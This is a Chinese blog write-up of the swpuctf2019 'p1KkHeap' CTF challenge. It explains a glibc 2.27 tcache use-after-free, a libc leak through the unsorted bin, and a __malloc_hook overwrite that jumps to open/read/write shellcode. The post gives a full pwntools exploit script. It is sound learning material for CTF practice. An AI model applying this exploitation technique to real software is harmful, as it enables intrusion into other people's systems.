swpuctf2019 p1KkHeap

最新推荐文章于 2022-03-12 11:01:19 发布
最新推荐文章于 2022-03-12 11:01:19 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/115428540
版权

在这里插入图片描述
这个函数用mmap映射了一大块内存,而且开了沙盒,我们可以知道禁用见execve,于是system函数和onegadget都不可行。于是就只能自己将shellcode(orw)写到0x66660000这个内存空间上,然后再想办法劫持到这边运行。
我们看看free函数
在这里插入图片描述
典型的uaf漏洞
这个2.27版本的,我们一般利用unsorted attach方式来泄露libc,但是我们发现free有限制,只能泄露3次,不能泄露到unsorted bins,但是我们发现但是tcache->count是一个无符号类型的数据,我们在double free后tcache成环,那么就可以一直malloc这一块地方内存,使tcache->count变为负数(实际上是很大的正数)。这样再free时就不会进入tcache中,而是进入unsort bin中,这样可以得到libc地址。
我这个题决定malloc hook,我们袭击mallochook填充0x66660000,我们把shellcode写在0x66660000就可以执行了,而且由于tcache不check大小,所以可以通过修改tcache_entry就可以malloc任意地址,由于沙盒,我们决定用open_write等函数来写shellcode
exp:

from pwn import *  
  
sh = process('./p1KkHeap')  
context(arch='amd64',os='linux')  
  

libc_path = './libc.so.6'  
libc = ELF(libc_path)  
malloc_hook_s = libc.symbols['__malloc_hook']  
open_s = libc.sym['open']  
read_s = libc.sym['read']  
write_s = libc.sym['write']  
  
def create(size):  
   sh.sendlineafter('Your Choice:','1')  
   sh.sendlineafter('size:',str(size))  
  
def show(index):  
   sh.sendlineafter('Your Choice:','2')  
   sh.sendlineafter('id:',str(index))  
  
def edit(index,content):  
   sh.sendlineafter('Your Choice:','3')  
   sh.sendlineafter('id:',str(index))  
   sh.sendafter('content:',content)  
  
def delete(index):  
   sh.sendlineafter('Your Choice:','4')  
   sh.sendlineafter('id:',str(index))  
  
#chunk0  
create(0x100)  
#chunk1,用来挡住chunk0与top块,这样chunk0放入unsorted bin时不会发生合并,指针就会保留在chunk0中  
create(0x40)  
  
#chunk0和自己形成双向链表  
delete(0)  
delete(0)  
#泄露chunk0的堆地址  
show(0)  
sh.recvuntil('content: ')  
heap_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x10  
  
#得到tcache存放表头的地址  
tcache_head_addr = heap_addr - 0x188  
  
#chunk2  
create(0x100)  
#将chunk0的fd指向表头指针处  
edit(2,p64(tcache_head_addr))  
#chunk3  
create(0x100)  
#chunk4,chunk4是tcache存放表头指针的位置,我们edit chunk4,就能修改tcache的表头  
#现在tcache 的count变成了-1,由于是无符号数,导致比较时>7成立  
create(0x100)  
#chunk0进入unsorted bin  
delete(0)  
#泄露main_arena+96的地址  
show(0)  
sh.recvuntil('content: ')  
  
main_arena_96 = u64(sh.recv(6).ljust(8,'\x00'))  
malloc_hook_addr = (main_arena_96 & 0xFFFFFFFFFFFFFF00) + (malloc_hook_s & 0xFF)  
libc_base = malloc_hook_addr - malloc_hook_s  
open_addr = libc_base + open_s  
read_addr = libc_base + read_s  
write_addr = libc_base + write_s  
  
  
#将表头指向0x66660000,这样我们就能分配到这里了  
edit(4,p64(0x66660000))  
  
shellcode=shellcraft.amd64.open('flag')
shellcode+=shellcraft.amd64.read(3,0x66660300,64)
shellcode+=shellcraft.amd64.write(1,0x66660300,64)
  
#chunk5分配到了0x66660000  
create(0x100)  
#写入shellcode到0x66660000  
edit(5,shellcode)  
  
print 'libc_base=',hex(libc_base)  
print 'malloc_hook_addr=',hex(malloc_hook_addr)  
  
  
#将malloc_hook设置为tcache bin表头  
edit(4,p64(malloc_hook_addr))  
#chunk6分配到malloc_hook处  
create(0x100)  
  
#写malloc_hook  
edit(6,p64(0x66660000))  
  
#触发malloc hook去执行我们在0x66660000处布下的shellcode  
create(0x1)  
  
sh.interactive()

具体看

w0nderMaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSH9.5p1
11-12
OpenSSH 9.5p1 是一个安全的网络连接工具,用于在不同计算机之间建立加密的通信通道。它是OpenSSH项目的最新版本,旨在提供安全的远程登录和其他网络服务,如文件传输。OpenSSH是SSH(Secure SHell)协议的开源实现...
openssh-9.5p1 RPM安装包
11-11
《openssh-9.5p1 RPM安装包在openEuler20.03系统中的应用与实践》 在Linux操作系统的世界中,安全的远程访问是运维工作中的关键环节,而OpenSSH(Open Source Secure SHell)正是这样一个强大的工具,它提供了一套...
【pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 686
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
swpuctf2019 p1KkHeap 详细题解
seaaseesa的博客
12-08 1467
p1KkHeap 这是swpuctf2019的一题,让我们来详细分析一下 本题的知识点:tcache bin,unsorted bin,malloc hook 首先,我们检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下 最大允许创建0x100的堆,并且最多有8个堆 漏洞点在这里,free后,只把大小置为0,而没有把堆指针置为0,存在UAF漏洞 本题,del...
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2127
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1674
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
2019广东省强网杯PWN-1
SkYe's Blog
09-24 705
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
SWPUCTF_2019_p1KkHeap
z1r0的博客
03-12 228
SWPUCTF_2019_p1KkHeap 查看保护 开了沙盒,用orw来读即可。 这里mmap了0x66660000这一段内存rwx权限。所以我们可以将shellcode放入这里。 一个uaf漏洞 攻击思路:因为有一个uaf,便是delete只能用三次。所以可以考虑攻击tcache这个结构体。然后劫持这个结构体实现任意地址分配 1.首先需要泄露一个heap_addr用这个heap_addr来计算出tcache的地址。创建的堆块超过fatstbin的大小即可。 这里笔者选的是0x100 2.泄露出了
openssh-9.4p1
10-08
《OpenSSH 9.4p1:安全连接的守护者》 OpenSSH 9.4p1 是一个广泛使用的开源工具,它提供了安全的网络连接服务,主要用于在远程计算机之间建立加密的通信通道。OpenSSH 的全称是 "Open Source Secure Shell",它是...
openssh-9.4p1.tar
09-25
《OpenSSH 9.4p1:安全连接的基石》 OpenSSH,全称为Open Source Secure SHell,是网络上广泛使用的开源安全协议,用于在不同主机之间建立加密的通信通道。OpenSSH 9.4p1是这个项目的一个特定版本,它提供了最新的...
Openssh9.7p1rpm
06-04
《OpenSSH 9.7p1 RPM:安全连接与远程管理的基石》 OpenSSH,全称为Open Source Secure Shell,是互联网上广泛使用的安全通信工具,用于加密网络连接,特别是远程登录和其他网络服务。OpenSSH 9.7p1 RPM是针对RPM包...
农牧集团企业数字化建设总体规划SAP解决方案参考.pdf
最新发布
08-17
农牧集团企业数字化建设总体规划SAP解决方案参考.pdf
java基于ssm+jsp软件工程项目管理系统源码 带毕业论文
08-17
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;JSP技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
stm32can通信示例
08-17
1、打开两路fifo接收中断 ok 2、打开过滤器配置掩码和列表过滤项 ok 3、测试双机通信 ok 存在问题:1、通信对接收数据时携带标准id打印 id号存在问题,扩展id号打印正常。
培训课件 -危险源辨识及管控安全培训.pptx
08-17
培训课件 -危险源辨识及管控安全培训.pptx
培训课件 -案例开发与教学.pptx
08-17
培训课件 -案例开发与教学.pptx
H为数据安全管理实践.docx
08-17
H为数据安全管理实践.docx
毕业设计asp.net超市收银系统三层-qkrp源码含文档工具包
08-17
毕业设计asp.net超市收银系统三层-qkrp源码含文档工具包 asp.net,数据库sqlserver,开发工具用Microsoft Visual Studio 开发一个超市收银管理系统,能为超市收银人提供方便快捷的服务,以及为超市收银管理人员提供准确可靠的信息。该系统能实现前台收银、商品管理、进货单管理、销售单管理、库存查询、库存盘点、商品调拨、营业统计和系统管理等。 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包(在说明文档中)
CentOS7 升级 OpenSSH 8.6p1 操作指南
"该文档是关于在CentOS7系统上升级OpenSSH到8.6p1版本的操作手册,包括备份原有SSH配置、安装OpenSSL补丁、解压并编译安装OpenSSH新版本、卸载旧版本、修改权限、设置启动脚本、启用自启动服务以及调整相关配置文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值